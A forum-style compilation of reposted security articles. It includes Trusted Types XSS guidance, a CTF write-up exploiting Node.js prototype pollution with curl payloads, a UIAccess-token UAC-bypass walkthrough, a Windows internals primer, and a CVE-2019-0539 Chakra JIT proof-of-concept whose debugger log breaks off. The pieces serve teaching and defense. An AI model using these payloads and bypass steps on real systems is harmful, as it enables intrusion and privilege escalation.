Abstracts Attacking Edge Through the JavaScript Just-In-Time Compiler Bruno Keith / Thursday, Feb 7, 10:30-11:15 AM Bridging Emulation and the Real World with the Nintendo Game Boy Or Pinchasof / Wednesday, Feb 6, 3:15-4:00 PM Hardening Secure Boot on Embedded Devices for Hostile Environments Niek Timmers | Riscure, Albert Spruyt, Cristofaro Mune | Pulse Security Wednesday, Feb 6, 11:45-12:30 PM Life as an iOS Attacker Luca Todesco (@qwertyoruiop) / Thursday, Feb 7, 5:15-6:00 PM Make Static Instrumentation Great Again: High Performance Fuzzing for Windows System Lucas Leong, Trend Micro / Thursday, Feb 7, 4:30-5:15 PM No Code No Crime: UPnP as an Off-the-Shelf Attacker's Toolkit x0rz / Thursday, Feb 7, 12:30-1:00 PM PE-sieve: An Open-Source Process Scanner for Hunting and Unpacking Malware Hasherezade / Thursday, Feb 7, 2:30-3:15 PM Postscript Pat and His Black and White Hat Steven Seeley / Thursday, Feb 7, 3:15-4:00 PM Practical Uses for Hardware-assisted Memory Visualization Ulf Frisk / Wednesday, Feb 6, 4:30-5:15 PM Supply Chain Security: "If I were a Nation State..." Andrew "bunnie" Huang / Wednesday, Feb 6, 10:30-11:15 AM The AMDFlaws Story: Technical Deep Dive Ido Li On & Uri Farkas, CTS Labs / Wednesday, Feb 6, 5:15-6:00 PM The Things That Lurk in the Shadows Costin Raiu, Kaspersky Lab / Wednesday, Feb 6, 12:30-1:00 PM Transmogrifying Other People's Marketing into Threat Hunting Treasures Using Machine Learning Magic Bhavna Soman, Microsoft / Wednesday, Feb 6, 1:00-1:30 PM Trends, Challenges, and Strategic Shifts in the Software Vulnerability Mitigation Landscape Matt Miller, Microsoft / Thursday, Feb 7, 11:45-12:30 PM Who’s Watching the Watchdog? Uncovering a Privilege Escalation Vulnerability in OEM Driver Amit Rapaport, Microsoft / Thursday, Feb 7, 1:00-1:30 PM You (dis)liked mimikatz? Wait for kekeo Benjamin Delpy (@gentilkiwi) / Wednesday, Feb 6, 2:30-3:15 PM Sursa: https://www.bluehatil.com/abstracts
-
Trusted Types help prevent Cross-Site Scripting TL;DR We've created a new experimental API that aims to prevent DOM-Based Cross Site Scripting in modern web applications. By Krzysztof Kotowicz Software Engineer in the Information Security Enginnering team at Google We’re currently working on the specification and implementation details for this API. We’ll keep this post updated as Trusted Types mature. Last update: 2019-02-15. Cross-Site Scripting Cross-Site Scripting (XSS) is the most prevalent vulnerability affecting web applications. We see this reflected both in our own data, and throughout the industry. Practice shows that maintaining an XSS-free application is still a difficult challenge, especially if the application is complex. While solutions for preventing server-side XSS are well known, DOM-based Cross-Site Scripting (DOM XSS) is a growing problem. For example, in Google's Vulnerability Reward Program DOM XSS is already the most common variant. Why is that? We think it's caused by two separate issues: XSS is easy to introduce DOM XSS occurs when one of injection sinks in DOM or other browser APIs is called with user-controlled data. For example, consider this snippet that intends to load a stylesheet for a given UI template the application uses: const templateId = location.hash.match(/tplid=([^;&]*)/)[1]; // ... document.head.innerHTML += `<link rel="stylesheet" href="./templates/${templateId}/style.css">` This code introduces DOM XSS by linking the attacker-controlled source (location.hash) with the injection sink (innerHTML). The attacker can exploit this bug by tricking their victim into visiting the following URL: https://example.com#tplid="><img src=x onerror=alert(1)> It's easy to make this mistake in code, especially if the code changes often. For example, maybe templateId was once generated and validated on the server, so this value used to be trustworthy? When assigning to innerHTML, all we know is that the value is a string, but should it be trusted? Where does it really come from? Additionally, the problem is not limited to just innerHTML. In a typical browser environment, there are over 60 sink functions or properties that require this caution. The DOM API is insecure by default and requires special treatment to prevent XSS. XSS is difficult to detect The code above is just an example, so it's trivial to see the bug. In practice, the sources and the sinks are often accessed in completely different application parts. The data from the source is passed around, and eventually reaches the sink. There are some functions that sanitize and verify the data. But was the right function called? Looking at the source code alone, it's difficult to know if it introduces a DOM XSS. It's not enough to grep the .js files for sensitive patterns. For one, the sensitive functions are often used through various wrappers and real-world vulnerabilities look more like this. Sometimes it's not even possible to tell if a codebase is vulnerable by only looking at it. obj[prop] = templateID If obj points to the Location object, and prop value is "href", this is very likely a DOM XSS, but one can only find that out when executing the code. As any part of your application can potentially hit a DOM sink, all of the code should undergo a manual security review to be sure - and the reviewer has to be extra careful to spot the bug. That's unlikely to happen. Trusted Types Trusted Types is the new browser API that might help address the above problems at the root cause - and in practice help obliterate DOM XSS. Trusted Types allow you to lock down the dangerous injection sinks - they stop being insecure by default, and cannot be called with strings. You can enable this enforcement by setting a special value in the Content Security Policy HTTP response header: Content-Security-Policy: trusted-types * Then, in the document you can no longer use strings with the injection sinks: const templateId = location.hash.match(/tplid=([^;&]*)/)[1]; // typeof templateId == "string" document.head.innerHTML += templateId // Throws a TypeError. To interact with those functions, you create special typed objects - Trusted Types. Those objects can be created only by certain functions in your application called Trusted Type Policies. The exemplary code "fixed" with Trusted Types would look like this: const templatePolicy = TrustedTypes.createPolicy('template', { createHTML: (templateId) => { const tpl = templateId; if (/^[0-9a-z-]$/.test(tpl)) { return `<link rel="stylesheet" href="./templates/${tpl}/style.css">`; } throw new TypeError(); } }); const html = templatePolicy.createHTML(location.hash.match(/tplid=([^;&]*)/)[1]); // html instanceof TrustedHTML document.head.innerHTML += html; Here, we create a template policy that verifies the passed template ID parameter and creates the resulting HTML. The policy object create* function calls into a respective user-defined function, and wraps the result in a Trusted Type object. In this case, templatePolicy.createHTML calls the provided templateId validation function, and returns a TrustedHTML with the <link ...> snippet. The browser allows TrustedHTML to be used with an injection sink that expects HTML - like innerHTML. It might seem that the only improvement is in adding the following check: if (/^[0-9a-z-]$/.test(tpl)) { /* allow the tplId */ } Indeed, this line is necessary to fix XSS. However, the real change is more profound. With Trusted Types enforcement, the only code that could introduce a DOM XSS vulnerability is the code of the policies. No other code can produce a value that the sink functions accept. As such, only the policies need to be reviewed for security issues. In our example, it doesn't really matter where the templateId value comes from, as the policy makes sure it's correctly validated first - the output of this particular policy does not introduce XSS. Limiting policies Did you notice the * value that we used in the Content-Security-Policy header? It indicates that the application can create arbitrary number of policies, provided each of them has a unique name. If applications can freely create a large number of policies, preventing DOM XSS in practice would be difficult. However, we can further limit this by specifying a whitelist of policy names like so: Content-Security-Policy: trusted-types template This assures that only a single policy with a name template can be created. That policy is then easy to identify in a source code, and can be effectively reviewed. With this, we can be certain that the application is free from DOM XSS. Nice job! In practice, modern web applications need only a small number of policies. The rule of thumb is to create a policy where the client-side code produces HTML or URLs - in script loaders, HTML templating libraries or HTML sanitizers. All the numerous dependencies that do not interact with the DOM, do not need the policies. Trusted Types assures that they can't be the cause of the XSS. Get started This is just a short overview of the API. We are working on providing more code examples, guides and documentation on how to migrate applications to Trusted Types. We feel this is the right moment for the web developer community to start experimenting with it. To get this new behavior on your site, you need to be signed up for the "Trusted Types" Origin Trial (in Chrome 73 through 76). If you just want to try it out locally, starting from Chrome 73 the experiment can be enabled on the command line: chrome --enable-blink-features=TrustedDOMTypes or chrome --enable-experimental-web-platform-features Alternatively, visit chrome://flags/#enable-experimental-web-platform-features and enable the feature. All of those options enable the feature globally in Chrome for the current session. If you experience crashes, use --enable-features=BlinkHeapUnifiedGarbageCollection as a workaround. See bug 929601 for details. We have also created a polyfill that enables you to test Trusted Types in other browsers. As always, let us know what you think. You can reach us on the trusted-types Google group or file issues on GitHub. Sursa: https://developers.google.com/web/updates/2019/02/trusted-types
-
Analysis and Exploitation of Prototype Pollution attacks on NodeJs - Nullcon HackIM CTF web 500 writeup Feb 15, 2019 • ctf Prototype Pollution attacks on NodeJs is a recent research by Olivier Arteau where he discovered how to exploit an application if we can pollute the prototype of a base object. Introduction Objects in javaScript Functions/Classes in javaScript? WTH is a constructor ? Prototypes in javaScript Prototype Pollution Merge() - Why was it vulnerable? References Introduction Prototype Pollution attacks, as the name suggests, is about polluting the prototype of a base object which can sometimes lead to RCE. This is a fantastic research done by Olivier Arteau and has given a talk on NorthSec 2018. Let’s take a look at the vulnerability in-depth with an example from Nullcon HackIm 2019 challenge named proton: Objects in javaScript An object in the javaScript is nothing but a collection of key value pairs where each pair is known as a property. Let’s take an example to illustrate (you can use the browser console to execute and try it yourself): var obj = { "name": "0daylabs", "website": "blog.0daylabs.com" } obj.name; // prints "0daylabs" obj.website; // prints "blog.0daylabs.com" console.log(obj); // prints the entire object along with all of its properties. In the above example, name and website are the properties of the object obj. If you carefully look at the last statement, the console.log prints out a lot more information than the properties we explicitly defined. Where are these properties coming from ? Object is the fundamental basic object upon which all other objects are created. We can create an empty object (without any properties) by passing the argument null during object creation, but by default it creates an object of a type that corresponds to its value and inherits all the properties to the newly created object (unless its null). console.log(Object.create(null)); // prints an empty object Functions/Classes in javaScript? In javaScript, the concept of classes and functions are relative (functions itself serves as the constructor for the class and there is no explicit “classes” itself). Let’s take an example: function person(fullName, age) { this.age = age; this.fullName = fullName; this.details = function() { return this.fullName + " has age: " + this.age; } } console.log(person.prototype); // prints the prototype property of the function /* {constructor: ƒ} constructor: ƒ person(fullName, age) __proto__: Object */ var person1 = new person("Anirudh", 25); var person2 = new person("Anand", 45); console.log(person1); /* person {age: 25, fullName: "Anirudh"} age: 45 fullName: "Anand" __proto__: constructor: ƒ person(fullName, age) arguments: null caller: null length: 2 name: "person" prototype: {constructor: ƒ} __proto__: ƒ () [[FunctionLocation]]: VM134:1 [[Scopes]]: Scopes[1] __proto__: Object */ console.log(person2); /* person {age: 45, fullName: "Anand"} age: 45 fullName: "Anand" __proto__: constructor: ƒ person(fullName, age) arguments: null caller: null length: 2 name: "person" prototype: {constructor: ƒ} __proto__: ƒ () [[FunctionLocation]]: VM134:1 [[Scopes]]: Scopes[1] __proto__: Object */ person1.details(); // prints "Anirudh has age: 25" In the above example, we defined a function named person and we created 2 objects named person1 and person2. If we take a look at the properties of the newly created function and objects, we can note 2 things: When a function is created, JavaScript engine includes a prototype property to the function. This prototype property is an object (called as prototype object) and has a constructor property by default which points back to the function on which prototype object is a property. When an object is created, JavaScript engine adds a __proto__ property to the newly created object which points to the prototype object of the constructor function. In short, object.__proto__ is pointing to function.prototype. WTH is a constructor ? Constructor is a magical property which returns the function that used to create the object. The prototype object has a constructor which points to the function itself and the constructor of the constructor is the global function constructor. var person3 = new person("test", 55); person3.constructor; // prints the function "person" itself person3.constructor.constructor; // prints ƒ Function() { [native code] } <- Global Function constructor person3.constructor.constructor("return 1"); /* ƒ anonymous( ) { return 1 } */ // Finally call the function person3.constructor.constructor("return 1")(); // returns 1 Prototypes in javaScript One of the things to note here is that the prototype property can be modified at run time to add/delete/edit entries. For example: function person(fullName, age) { this.age = age; this.fullName = fullName; } var person1 = new person("Anirudh", 25); person.prototype.details = function() { return this.fullName + " has age: " + this.age; } console.log(person1.details()); // prints "Anirudh has age: 25" What we did above is that we modified the function’s prototype to add a new property. The same result can be achieved using objects: function person(fullName, age) { this.age = age; this.fullName = fullName; } var person1 = new person("Anirudh", 25); var person2 = new person("Anand", 45); // Using person1 object person1.constructor.prototype.details = function() { return this.fullName + " has age: " + this.age; } console.log(person1.details()); // prints "Anirudh has age: 25" console.log(person2.details()); // prints "Anand has age: 45" :O Noticied anything suspicious? We modified person1 object but why person2 also got affected? The reason being that in the first example, we directly modified person.prototype to add a new property but in the 2nd example we did exactly the same but by using object. We have already seen that constructor returns the function using which the object is created so person1.constructor points to the function person itself and person1.constructor.prototype is the same as person.prototype. Prototype Pollution Let’s take an example, obj[a] = value. If an attacker can control a and value, then he can set the value of a to __proto__ and the property b will be defined for all existing objects of the application with the value value. The attack is not as simple as it feels like from the above statement. According to the research paper, this is exploitable only if any of the following 3 happens: Object recursive merge Property definition by path Object clone Let’s take the Nullcon HackIM challenge to see a practical scenario. The challenge starts with iterating a MongoDB id (which was trivial to do) and we get access to the below source code: 'use strict'; const express = require('express'); const bodyParser = require('body-parser') const cookieParser = require('cookie-parser'); const path = require('path'); const isObject = obj => obj && obj.constructor && obj.constructor === Object; function merge(a, b) { for (var attr in b) { if (isObject(a[attr]) && isObject(b[attr])) { merge(a[attr], b[attr]); } else { a[attr] = b[attr]; } } return a } function clone(a) { return merge({}, a); } // Constants const PORT = 8080; const HOST = '0.0.0.0'; const admin = {}; // App const app = express(); app.use(bodyParser.json()) app.use(cookieParser()); app.use('/', express.static(path.join(__dirname, 'views'))); app.post('/signup', (req, res) => { var body = JSON.parse(JSON.stringify(req.body)); var copybody = clone(body) if (copybody.name) { res.cookie('name', copybody.name).json({ "done": "cookie set" }); } else { res.json({ "error": "cookie not set" }) } }); app.get('/getFlag', (req, res) => { var аdmin = JSON.parse(JSON.stringify(req.cookies)) if (admin.аdmin == 1) { res.send("hackim19{}"); } else { res.send("You are not authorized"); } }); app.listen(PORT, HOST); console.log(`Running on http://${HOST}:${PORT}`); The code starts with defining a function merge which is essentially an insecure design of merging 2 objects. Since the latest version of libraries that does the merge() has already been patched, the challenge delibrately used the old method in which merge used to happen to make it vulnerable. One thing we can quickly notice in the above code is the definition of 2 “admins” as const admin and var аdmin. Ideally javaScript doesn’t allow to define a const variable again as var so this has to be different. It took a good amount of time to figure out that one of them has a normal a while the other has some other a (homograph). So instead of wasting time over it, I renamed it to normal a itself and worked on the challenge so that once solved, we can send the payload accordingly. So from the challenge source code, here are the following observations: Merge() function is written in a way that prototype pollution can happen (more analysis of the same later in the article). So that’s indeed the way to solve the problem. The vulnerable function is actually called while hitting /signup via clone(body) so we can send our JSON payload while signing up which can add the admin property and immediately call /getFlag to get the flag. As discussed above, we can use __proto__ (points to constructor.prototype) to create the admin property with value 1. The simplest payload to do the same: {"__proto__": {"admin": 1}} So the final payload to solve the problem (using curl since I was not able to send homograph via burp): curl -vv --header 'Content-type: application/json' -d '{"__proto__": {"admin": 1}}' 'http://0.0.0.0:4000/signup'; curl -vv 'http://0.0.0.0:4000/getFlag' Merge() - Why was it vulnerable? One obvious question here is, what makes the merge() function vulnerable here? Here is how it works and what makes it vulnerable: The function starts with iterating all properties that is present on the 2nd object b (since 2nd is given preference incase of same key-value pairs). If the property exists on both first and second arguments and they are both of type Object, then it recusively starts to merge it. Now if we can control the value of b[attr] to make attr as __proto__ and also if we can control the value inside the proto property in b, then while recursion, a[attr] at some point will actually point to prototype of the object a and we can successfully add a new property to all the objects. Still confused ? Well I don’t blame, because it took sometime for me also to understand the concept. Let’s write some debug statements to figure out what is happening. const isObject = obj => obj && obj.constructor && obj.constructor === Object; function merge(a, b) { console.log(b); // prints { __proto__: { admin: 1 } } for (var attr in b) { console.log("Current attribute: " + attr); // prints Current attribute: __proto__ if (isObject(a[attr]) && isObject(b[attr])) { merge(a[attr], b[attr]); } else { a[attr] = b[attr]; } } return a } function clone(a) { return merge({}, a); } Now let’s try sending the curl request mentioned above. What we can notice is that the object b now has the value: { __proto__: { admin: 1 } } where __proto__ is just a property name and is not actually pointing to function prototype. Now during the function merge(), for (var attr in b) iterates through every attribute where the first attribute name now is __proto__. Since it’s always of type object, it starts to recursively call, this time as merge(a[__proto__], b[__proto__]). This essentially helped us in getting access to function prototype of a and add new properties which is defined in the proto property of b. References Olivier Arteau – Prototype pollution attacks in NodeJS applications Prototypes in javaScript MDN Web Docs - Object Anirudh Anand Security Engineer @flipkart | Web Application Security ♥ | Google, Microsoft, Zendesk, Gitlab Hall of Fames | Blogger | CTF lover - @teambi0s | certs - eWDP, OSCP Sursa: https://blog.0daylabs.com/2019/02/15/prototype-pollution-javascript/
-
- 1
-
-
Trends, Challenges, and Strategic Shifts in the Software Vulnerability Mitigation Landscape The software vulnerability landscape has changed dramatically over the past 20+ years. During this period, we’ve gone from easy-to-exploit stack buffer overruns to complex-and-expensive chains of multiple exploits. To better understand this evolution, this presentation will describe the vulnerability mitigation strategy Microsoft has been pursuing and will show how this strategy has influenced vulnerability and exploitation trends over time. This retrospective will form the basis for discussing some of the vulnerability mitigation challenges that exist today and the strategic shifts that Microsoft is exploring to address those challenges.
-
- 1
-
-
Thursday, 14 February 2019 Accessing Access Tokens for UIAccess I mentioned in a previous blog post (link) Windows RS5 finally kills the abuse of Access Tokens, as far as I can tell, to elevate to admin by just opening the access token. This is a shame, but personally I didn't care. However, I was contacted on Twitter about some UAC related things, specifically getting UIAccess. I was surprised that people have not been curious enough to put two and two together and realize that the previous token stealing bug can still be used to get you UIAccess even if the direct path to admin has been blocked. This blog post gives a bit of information on why you might care about UIAccess and how you can get your own code running as UIAccess. TL;DR; you can do the same token stealing trick with UIAccess processes, which doesn't require an elevation prompt, then automate the UI of a privileged process to get a UAC bypass. An example PowerShell script which does this is on my github. First, what is UIAccess? One of the related features of UAC was User Interface Privilege Isolation (UIPI). UIPI limits the ability of a process interacting with the windows of a higher integrity level process, preventing a malicious application automating a privileged UI to elevate privileges. There's of course some holes which have been discovered over the years but the fundamental principle is sound. However there's a big problem, what about Assistive Technologies? Many people rely on on-screen keyboards, screen readers and the like, they won't work if you can't read and automate the privileged UI. If you're blind does that mean you can't be an administrator? The design Microsoft went with was for a backdoor to UIPI and added a special flag to Access Tokens called UIAccess. When this flag is set most of the UIPI features of WIN32K are relaxed. From an escalation perspective if you have UIAccess you can automate the windows of a higher integrity process, say an administrator command prompt and use that access to bypass, further, UAC prompts. You can set the UIAccess flag on a token by calling SetTokenInformation and pass the TokenUIAccess information class. If you do that you'll find that you can't set the flag as a normal user, you need SeTcbPrivilege which is typically only granted to SYSTEM. If you need a "God" privilege to set the flag how does UIAccess get set in normal operation? You need to get the AppInfo service to spawn your process with an appropriate set of flags or just call ShellExecute. As the service runs as SYSTEM with SeTcbPrivilege is can set the UIAccess flag on start up. While the Consent application will spawn for UIAccess no UAC prompt will show (otherwise what's the point?). The AppInfo service spawns admin UAC processes, however by setting the uiAccess attribute in your manifest to true it'll instead spawn your process as UIAccess. However, it's not that simple, as per this link you also need sign the executable (easy as it can be self-signed) but also the executable must be in a secure location such as System32 or Program Files (harder). To prevent a malicious application spawning a UIAccess process, then injecting code into it, the AppInfo service tweaks the integrity of the token to be High (for split-token admin) or the current integrity plus 16 for normal users. This elevated integrity blocks read/write access to the new process. Of course there are bugs, for example I found one in 2014, since fixed, in the secure location check by abusing directory NTFS named streams. UACME also has an exploit which abuses UIAccess (method 32, based on this blog post) if you can find a writable secure location directory or abuse the existing IFileOperation tricks to write a file into the appropriate location. However, for those keeping score the UIAccess is a property of the access token. As the OS doesn't do anything special to clear it you can open the token from an existing UIAccess process, take it's token and create a new process with that token and start automating the heck out of privileged windows ? In summary here's how to exploit this behavior on a completely default install of Windows 10 RS5 and below. Find or start a UIAccess process, such as the on-screen keyboard (OSK.EXE). As AppInfo doesn't prompt for UIAccess this can be done, relatively, silently. Open the process for PROCESS_QUERY_LIMITED_INFORMATION access. This is allowed as long as you have any access to the process. This could even be done from a Low integrity process (but not from an AC) although on Windows 10 RS5 some other sandbox mitigations get in the way in the next step, but it should work on Windows 7. Open the process token for TOKEN_DUPLICATE access and duplicate the token to a new writable primary token. Set the new token's integrity to match your current token's integrity. Use the token in CreateProcessAsUser to spawn a new process with the UIAccess flag. Automate the UI to your heart's desire. Based on my original blogs you might wonder how I can create a new process with the token when previously I could only impersonate? For UIAccess the AppInfo service just modifies a copy of the caller's token rather than using the linked token. This means the UIAccess token is considered a sibling of any other process on the desktop and so is permitted to assign the primary token as long as the integrity is dropped to be equal or lower than the current integrity. As an example I've uploaded a PowerShell script which does the attack and uses the SendKeys class to write an arbitrary command to a focused elevated command prompt on the desktop (how you get the command prompt is out of scope). There's almost certainly other tricks you can do once you've got UIAccess. For example if the administrator has set the "User Account Control: Allow UIAccess applications to prompt for elevation without using the secure desktop" group policy then it's possible to disable the secure desktop from a UIAccess process and automate the elevation prompt itself. In conclusion, while the old admin token stealing trick went away it doesn't mean it doesn't still have value. By abusing UIAccess programs we can almost certainly bypass UAC. Of course as it's not a security boundary and is so full of holes I'm not sure anyone cares about it Posted by tiraniddo at 15:42 Sursa: https://tyranidslair.blogspot.com/2019/02/accessing-access-tokens-for-uiaccess.html
-
- 1
-
-
Reverse Engineering Malware, Part 4: Windows Internals July 4, 2017 Welcome back to my Reverse Engineering Malware series. In general, reverse engineering of malware is done on Windows systems. That's because despite recent inroads by Linux and the Mac OS, Windows systems still comprise over 90% of all computing systems in the world. As such, well over 90% of malware is designed to compromise Windows system. For this reason, it makes sense to focus our attention to Windows operating systems. When reversing malware, the operating system plays a key role. All applications interact with the operating system and are tightly integrated with the OS. We can gather a significant amount of information on the malware by probing the interface between the OS and the application (malware). To understand how malware can use and manipulate Windows then, we need to better understand the inner workings of the Windows operating system. In this article, we will examine the inner workings or Windows 32-bit systems so that we can better understand how malware can use the operating system for its malicious purposes. Windows internals could fill several textbooks (and has), so I will attempt to just cover the most important topics and only in a cursory way. I hope to leave you with enough information though, that you can effectively reverse the malware in the following articles. Virtual Memory Virtual memory is the idea that instead of software directly accessing the physical memory, the CPU and the operating system create an invisible layer between the software and the physical memory. The OS creates a table that the CPU consults called the page table that directs the process to the location of the physical memory that it should use. Processors divide memory into pages Pages are fixed sized chunks of memory. Each entry in the page table references one page of memory. In general, 32 -bit processors use 4k sized pages with some exceptions. Kernel v User Mode Having a page table enables the processor to enforce rules on how memory will be accessed. For instance, page table entries often have flags that determine whether the page can be accessed from a non-privileged mode (user mode). In this way, the operating system's code can reside inside the process's address space without concern that it will be accessed by non-privileged processes. This protects the operating system's sensitive data. This distinction between privileged vs. non-privileged mode becomes kernel (privileged) and non-privileged (user) modes. Kernel memory Space The kernel reserves 2gb of address space for itself. This address space contains all the kernel code, including the kernel itself and any other kernel components such as device drivers Paging Paging is the process where memory regions are temporarily flushed to the hard drive when they have not been used recently. The processor tracks the time since a page of memory was last used and the oldest is flushed. Obviously, physical memory is faster and more expensive than space on the hard drive. The windows operating system tracks when a page was last accessed and then uses that information to locate pages that haven't been accessed in a while. Windows then flushes their content to a file. The contents of the flushed pages can then be discarded and the space used by other information. When the operating system needs to access these flushed pages, a page fault will be generated and then system then does that the information has "paged out" to a file. Then, the operating system will access the page file and pull the information back into memory to be used. Objects and Handles The Windows kernel manages objects using a centralized object manager component. This object manager is responsible for all kernel objects such as sections, files, and device objects, synchronization objects, processes and threads. It ONLY manages kernel objects. GUI-related objects are managed by separate object managers that are implemented inside WIN32K.SYS Kernel code typically accesses objects using direct pointers to the object data structures. Applications use handles for accessing individual objects Handles A handle is process specific numeric identifier which is an index into the processes private handle table. Each entry in the handle table contains a pointer to the underlying object, which is how the system associates handles with objects. Each handle entry also contains an access mask that determines which types of operations that can be performed on the object using this specific handle. Processes A process is really just an isolated memory address space that is used to run a program. Address spaces are created for every program to make sure that each program runs in its own address space without colliding with other processes. Inside a processes' address space the system can load code modules, but must have at latest one thread running to do so. Process Initialization The creation of the process object and the new address space is the first step. When a new process calls the Win32 API CreateProcess, the API creates a process object and allocates a new memory address space for the process. CreateProcess maps NTDLL.DLL and the program executable (the .exe file) into the newly created address space. CreateProcess creates the process's first thread and allocates stack space it. The processes first thread is resumed and starts running in the LdrpInitialization function inside NTDLL.DLL LdrpInitialization recursively traverses the primary executable's import tables and maps them to memory every executable that is required. At this point, control passes into LdrpRunInitializeRoutines, which is an internal NTDLL routine responsible for initializing all statically linked DLL's currently loaded into the address space. The initialization process consists of a link each DLL's entry point with the DLL_PROCESS_ATTACH constant. Once all the DLL's are initialized, LdrpInitialize calls the thread's real initialization routine, which is the BaseProcessStart function from KERNELL32.DLL. This function in turn calls the executable's WinMain entry point, at which point the process has completed it's initialization sequence. Threads At ant given moment, each processor in the system is running one thread. Instead of continuing to run a single piece of code until it completes, Windows can decide to interrupt a running thread at given given time and switch to execution of another thread. A thread is a data structure that has a CONTEXT data structure. This CONTEXT includes; (1) the state of the processor when the thread last ran (2) one or two memory blocks that are used for stack space (3) stack space is used to save off current state of thread when context switched (4) components that manage threads in windows are the scheduler and the dispatcher (5) Deciding which thread get s to run for how long and perform context switch Context Switch Context switch is the thread interruption. In some cases, threads just give up the CPU on their own and the kernel doesn't have to interrupt. Every thread is assigned a quantum, which quantifies has long the the thread can run without interruption. Once the quantum expires, the thread is interrupted and other threads are allowed to run. This entire process is transparent to thread. The kernel then stores the state of the CPU registers before suspending and then restores that register state when the thread is resumed. Win32 API An API is a set of functions that the operating system makes available to application programs for communicating with the OS. The Win32 API is a large set of functions that make up the official low-level programming interface for Windows applications. The MFC is a common interface to the Win32 API. The three main components of the Win 32 API are; (1) Kernel or Base API's: These are the non GUI related services such as I/O, memory, object and process an d thread management (2) GDI API's : these include low-level graphics services such a s those for drawing a line, displaying bitmap, etc. (3) USER API's : these are the higher level GUI-related services such as window management, menus, dialog boxes, user-interface controls. System Calls A system call is when a user mode code needs to cal a kernel mode function. This usually happens when an application calls an operating system API. User mode code invokes a special CPU instruction that tells the processor to switch to its privileged mode and call a dispatch routine. This dispatch routine then calls the specific system function requested from user mode. PE Format The Windows executable format is a PE (portable Executable). The term "portable" refers to format's versatility in numerous environments and architectures. Executable files are relocatable. This means that they could be loaded at a different virtual address each time they are loaded. An executable must coexist with other executables that are loaded in the same memory address. Other than the main executable, every program has a certain number of additional executables loaded into its address space regardless of whether it has DLL's of its own or not. Relocation Issues If two excutables attempt to be loaded into the same virtual space, one must be relocated to another virtual space. each executable is module is assigned a base address and if something is already there, it must be relocated. There are never absolute memory addresses in executable headers, those only exist in the code. To make this work, whenever there is a pointer inside the executable header, it is always a relative virtual address (RVA). Think of this as simply an offset. When the file is loaded, it is assigned a virtual address and the loaded calculates real virtual addresses out of RVA's by adding the modules base address to an RVA. Image Sections An executable section is divided into individual sections in which the file's contents are stored. Sections are needed because different areas in the file are treated differently by the memory manager when a module is loaded. This division takes place in the code section (also called text) containing the executable's code and a data section containing the executable's data. When loaded, the memory manager sets the access rights on memory pages in the different sections based on their settings in the section header. Section Alignment Individual sections often have different access settings defined in the executable header. The memory manager must apply these access settings when an executable image is loaded. Sections must typically be page aligned when an executable is loaded into memory. It would take extra space on disk to page align sections on disk. Therefore, the PE header has two different kinds of alignment fields, section alignment and file alignment. DLL's DLL's allow a program to be broken into more than one executable file. In this way, overall memory consumption is reduced, executables are not loaded until features they implement are required. Individual components can be replaced or upgraded to modify or improve a certain aspect of the program. DLL's can dramatically reduce overall system memory consumption because the system can detect that a certain executable has been loaded into more than one address space, then map it into each address space instead of reloading it into a new memory location. DLL's are different from static libraries (.lib) which linked to the executable. Loading DLL's Static Linking is implemented by having each module list the the modules it uses and the functions it calls within each module. This is known as an import table (see IDA Pro tutorial). Run time linking refers to a different process whereby an executable can decide to load another executable in runtime and call a function from that executable. PE Headers A Portable Executable (PE) file starts with a DOS header. "This program cannot be run in DOS mode" typedef struct _IMAGE_NT_HEADERS { DWORD Signature; IMAFE_FILE_HEADER Fileheader; IMAGE_OPTIONAL_HEADER32 OptionHeader; } Image_NT_HEADERS32, *PIMAGE_NT_HEADERS32 This data structure references two data structures which contain the actual PE header. Imports and Exports Imports and Exports are the mechanisms that enable the dynamic linking process of executables. The compiler has no idea of the actual addresses of the imported functions, only in runtime will these addresses be known. To solve this issue, the linker creates a import table that lists all the functions imported by the current module by their names. Susa: https://www.hackers-arise.com/single-post/2017/07/04/Reverse-Engineering-Malware-Part-4-Windows-Internals
-
- 1
-
-
CVE-2019-0539 Root Cause Analysis. Microsoft Edge Chakra JIT Type Confusion Rom Cncynatus and Shlomi Levin Introduction Setup Time Travel Debugging Root Cause Analysis Final Thoughts More Articles Contact Introduction. CVE-2019-0539 was fixed in the Microsoft Edge Chakra Engine update for January 2019. This bug and 2 others were discovered and reported by Lokihardt of Google Project Zero. The bug can lead to a remote code execution by visiting a malicious web page. As Lokihardt describes, this type confusion bug occurs when the code generated by the Chakra just-in-time (JIT) javascript compiler unknowingly performs a type transition of an object and incorrectly assumes no side effects on the object later on. As Abhijith Chatra of the Chakra dev team describes in his blog, Dynamic type objects have a property map and a slot array. The property map is used to know the index of an object’s property in the slot array. The slot array stores the actual data of the property. CVE-2019-0539 causes the JIT code to confuse the object in memory which causes the slot array pointer to be overridden with arbitrary data. Setup. Build the vulnerable version of ChakraCore for windows https://github.com/Microsoft/ChakraCore/wiki/Building-ChakraCore (in Visual Studio MSBuild Command Prompt) c:\code>git clone https://github.com/Microsoft/ChakraCore.git c:\code>cd ChakraCore c:\code\ChakraCore>git checkout 331aa3931ab69ca2bd64f7e020165e693b8030b5 c:\code\ChakraCore>msbuild /m /p:Platform=x64 /p:Configuration=Debug Build\Chakra.Core.sln Time Travel Debugging. This blog makes use of TTD (Time Travel Debugging). As described by Microsoft: Time Travel Debugging, is a tool that allows you to record an execution of your process running, then replay it later both forwards and backwards. Time Travel Debugging (TTD) can help you debug issues easier by letting you "rewind" your debugger session, instead of having to reproduce the issue until you find the bug. Install the latest Windbg preview from the Microsoft Store. Don’t forget to run it with Administrator privileges. Root Cause Analysis. PoC: function opt(o, c, value) { o.b = 1; class A extends c { // may transition the object } o.a = value; // overwrite slot array pointer } function main() { for (let i = 0; i < 2000; i++) { let o = {a: 1, b: 2}; opt(o, (function () {}), {}); } let o = {a: 1, b: 2}; let cons = function () {}; cons.prototype = o; // causes "class A extends c" to transition the object type opt(o, cons, 0x1234); print(o.a); // access the slot array pointer resulting in a crash } main(); Run the debugger with TTD until it crashes and then perform the following commands 0:005> !tt 0 Setting position to the beginning of the trace Setting position: 14:0 (1e8c.4bc8): Break instruction exception - code 80000003 (first/second chance not available) Time Travel Position: 14:0 ntdll!LdrInitializeThunk: 00007fff`03625640 4053 push rbx 0:000> g ModLoad: 00007fff`007e0000 00007fff`0087e000 C:\Windows\System32\sechost.dll ModLoad: 00007fff`00f40000 00007fff`00fe3000 C:\Windows\System32\advapi32.dll ModLoad: 00007ffe`ffde0000 00007ffe`ffe00000 C:\Windows\System32\win32u.dll ModLoad: 00007fff`00930000 00007fff`00ac7000 C:\Windows\System32\USER32.dll ModLoad: 00007ffe`ff940000 00007ffe`ffada000 